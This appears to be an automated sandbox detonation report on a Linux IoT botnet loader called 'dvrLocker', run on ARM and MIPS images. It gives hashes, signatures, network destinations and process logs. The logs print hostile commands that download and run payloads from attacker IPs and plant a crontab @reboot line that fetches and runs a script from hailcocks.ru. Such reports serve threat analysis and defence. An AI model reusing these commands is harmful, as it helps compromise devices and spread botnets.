| SHA256 | 9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560 |
| SHA512 | c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732 |
/tmp/lib/dvrLocker
| MD5 | a016f79253a036ed87dd3ae118767cf2 |
| SHA1 | 52c10912a82115af3a6dca21993c223a6e7c669d |
| SHA256 | 95f180a725b479687bdb9818991a68be75f0ba901c969cc93746e9996c1d0e50 |
| SHA512 | 516191548c77eca021d07886a811f2fa6fc4be4f0321d5d61c1452cb22606877349a2dc80b03725f6e18fc0ce2524b0040baa6bdbabb40e9342da4401aa6e509 |
/tmp/lib/dvrLocker
| MD5 | 78c772ea162b97132c3b76f6c313d326 |
| SHA1 | d45f7fc473e9e47185541bff467721386245e8e6 |
| SHA256 | a621a97a08419ab7d35eecb70ae4a9f8849f621101821ca84df3886252ace701 |
| SHA512 | fde9dc70c6cc6fa518a81cf52fe4bcba66c54afeb8986644dfa700bc1c9766f3d51160ebc7b2eb98c50c99a26b3caea541783b59d1bb208d8746f96121a70a00 |
/var/spool/cron/crontabs/tmp.jeG6xK
| MD5 | 50615ad6e26d96511b53202a444c5adf |
| SHA1 | 5bd5689ac12e87808368ca533ac37de5e87a5572 |
| SHA256 | 9d9de6a1533d670579c5ef30d6ec10792da69ea28cf2db0589549668ee5b5e5b |
| SHA512 | 815b123082890500949a2d90d67e9d202f02a03b112aedb71ca28efcf92d6e28b8ce49034f3111cf8e5eeb3296f381911be3835538f3928ead826af632400741 |
/mnt/dvrLocker
| MD5 | b1a1559b205459098f1fff627d35c808 |
| SHA1 | 983f62052375084a8c125353e0c25b7cd19bd369 |
| SHA256 | e4837942ba2584de61bc3a75eba74f4eb0a137a7807130553c42d470c3ec01da |
| SHA512 | 3bb8ec38b6f3d17f7c7307785f609031b30056da380377bce27bdd48678cbbc81c4b7203ff511794ec6d23644952a82fa471e13149c014a91378f08305e6f60d |
/var/spool/cron/crontabs/tmp.k7lYiR
| MD5 | 9ed1c2ba0b84e3f738ead207c7035a35 |
| SHA1 | 493f92e391ccf01c25c53e11a1b793240e79f5f6 |
| SHA256 | 04195b12cd1400e8252bead74661e3384632a0bbcea5d8c52f8e0635bdc3919d |
| SHA512 | 705d28611e2f551e51df9e60b99c189244c4798674b9d114fbf3072a30418c8783bd1a7ee0991439e8b02ec9480d3848840299151bb2b86f328a7c08a08e12bc |
/var/spool/cron/crontabs/tmp.kwgToV
| MD5 | fa18d8ddc32b949074f8e5955ee746e0 |
| SHA1 | 66bf6733f867d38bf1506f2fcf730444c6eacee2 |
| SHA256 | 52c9e4b1a2d1ca0b4de5f5f4cce9aa98ec17b37a49ed2fc1842bb78937765dc9 |
| SHA512 | a6a8017f1050d8f03eea7cf66522c39d64661c4d44c1642317c8ebf20d20c7d8e9f47e45bf01d512323195150cbee0dc3dd8da4bf90735b273a64eddaebc85ac |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:43
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod (8 events) | N/A |
| N/A | N/A | /bin/sh | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker (8 events) | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 152.53.15.127 | N/A | N/A |
| Destination IP | 168.235.111.72 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.x2KALa | /usr/bin/crontab | N/A |
Enumerates running processes
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /tmp/lib/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/834/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/860/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/835/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/mounts | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/841/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/2/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/868/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/870/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/772/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/838/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/843/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/827/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/842/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/869/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/872/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/874/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/829/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/814/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/848/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/861/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/845/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/852/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/856/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/813/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/810/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/865/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/822/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/826/status | /tmp/lib/dvrLocker | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/106/exe]
/bin/ls
[ls -l /proc/108/exe]
/bin/ls
[ls -l /proc/109/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/137/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/141/exe]
/bin/ls
[ls -l /proc/146/exe]
/bin/ls
[ls -l /proc/147/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/167/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/200/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/219/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/25/exe]
/bin/ls
[ls -l /proc/26/exe]
/bin/ls
[ls -l /proc/268/exe]
/bin/ls
[ls -l /proc/269/exe]
/bin/ls
[ls -l /proc/27/exe]
/bin/ls
[ls -l /proc/271/exe]
/bin/ls
[ls -l /proc/273/exe]
/bin/ls
[ls -l /proc/274/exe]
/bin/ls
[ls -l /proc/28/exe]
/bin/ls
[ls -l /proc/29/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/305/exe]
/bin/ls
[ls -l /proc/308/exe]
/bin/ls
[ls -l /proc/309/exe]
/bin/ls
[ls -l /proc/321/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/41/exe]
/bin/ls
[ls -l /proc/42/exe]
/bin/ls
[ls -l /proc/43/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/573/exe]
/bin/ls
[ls -l /proc/586/exe]
/bin/ls
[ls -l /proc/591/exe]
/bin/ls
[ls -l /proc/593/exe]
/bin/ls
[ls -l /proc/594/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/625/exe]
/bin/ls
[ls -l /proc/632/exe]
/bin/ls
[ls -l /proc/633/exe]
/bin/ls
[ls -l /proc/635/exe]
/bin/ls
[ls -l /proc/637/exe]
/bin/ls
[ls -l /proc/638/exe]
/bin/ls
[ls -l /proc/639/exe]
/bin/ls
[ls -l /proc/640/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/76/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/ls
[ls -l /proc/98/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf arm]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf /mnt/dvrLocker]
Network
| Country | Destination | Domain | Proto |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| DE | 152.53.15.127:53 | kingstonwikkerink.dyn | udp |
| US | 217.28.130.41:11973 | kingstonwikkerink.dyn | tcp |
| US | 168.235.111.72:53 | kingstonwikkerink.dyn | udp |
| GB | 91.149.238.18:8414 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | N/A | udp |
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/tmp/lib/dvrLocker
| MD5 | 559f129d380ad1cfb60792c6b2dc3d32 |
| SHA1 | 3997a0fc0bd5958783f1751364ec407c5b170adc |
| SHA256 | fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d |
| SHA512 | 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112 |
/tmp/lib/dvrLocker
| MD5 | d09db60a70d5b53b5b53ad39476fd7e8 |
| SHA1 | 73a75e5e8200f77d857a7256cc0979077e29241d |
| SHA256 | 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165 |
| SHA512 | ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04 |
/var/spool/cron/crontabs/tmp.x2KALa
| MD5 | c8f52a3f659ca7c7be0a52692aa80acb |
| SHA1 | 1e01d51afb31de66a9a6896f490cbdc600d6fbb2 |
| SHA256 | 0c4cc6adfb5874320fd772ed7dd0cfc7de1be3fa71f2514372340060dbcd0a10 |
| SHA512 | 9c698983ab33f355f131c79974f0b1028a0ddb987011b14c34b2f64d56f14edc0cb7093f8b4284780b9d06234a9faa89eb25863ee873aade327f936cd04aba3f |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:43
Platform
debian9-mipsbe-20240418-en
Max time kernel
106s
Max time network
142s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 202.61.197.122 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.cK7Kfe | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/busybox telentd | /tmp/lib/dvrLocker | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/894/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/857/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/874/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/876/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/895/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/907/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/938/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/852/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/889/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/914/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/711/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/858/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/948/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/865/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/882/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/919/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/937/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/881/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/886/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/905/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/920/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/856/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/909/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/916/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/915/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/926/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/851/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/899/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/896/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/913/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/923/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/942/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/859/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/869/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/872/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/877/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/903/status | /tmp/lib/dvrLocker | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
| File opened for reading | /proc/filesystems | /bin/ls | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/111/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/121/exe]
/bin/ls
[ls -l /proc/122/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/148/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/157/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/173/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/207/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/234/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/319/exe]
/bin/ls
[ls -l /proc/320/exe]
/bin/ls
[ls -l /proc/323/exe]
/bin/ls
[ls -l /proc/325/exe]
/bin/ls
[ls -l /proc/326/exe]
/bin/ls
[ls -l /proc/36/exe]
/bin/ls
[ls -l /proc/37/exe]
/bin/ls
[ls -l /proc/378/exe]
/bin/ls
[ls -l /proc/379/exe]
/bin/ls
[ls -l /proc/383/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/427/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/665/exe]
/bin/ls
[ls -l /proc/668/exe]
/bin/ls
[ls -l /proc/671/exe]
/bin/ls
[ls -l /proc/672/exe]
/bin/ls
[ls -l /proc/688/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/70/exe]
/bin/ls
[ls -l /proc/701/exe]
/bin/ls
[ls -l /proc/702/exe]
/bin/ls
[ls -l /proc/705/exe]
/bin/ls
[ls -l /proc/708/exe]
/bin/ls
[ls -l /proc/709/exe]
/bin/ls
[ls -l /proc/71/exe]
/bin/ls
[ls -l /proc/711/exe]
/bin/ls
[ls -l /proc/712/exe]
/bin/ls
[ls -l /proc/713/exe]
/bin/ls
[ls -l /proc/72/exe]
/bin/ls
[ls -l /proc/73/exe]
/bin/ls
[ls -l /proc/74/exe]
/bin/ls
[ls -l /proc/75/exe]
/bin/ls
[ls -l /proc/76/exe]
/bin/ls
[ls -l /proc/77/exe]
/bin/ls
[ls -l /proc/78/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/80/exe]
/bin/ls
[ls -l /proc/82/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf mips]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
/bin/rm
[rm -rf /mnt/dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf x86]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
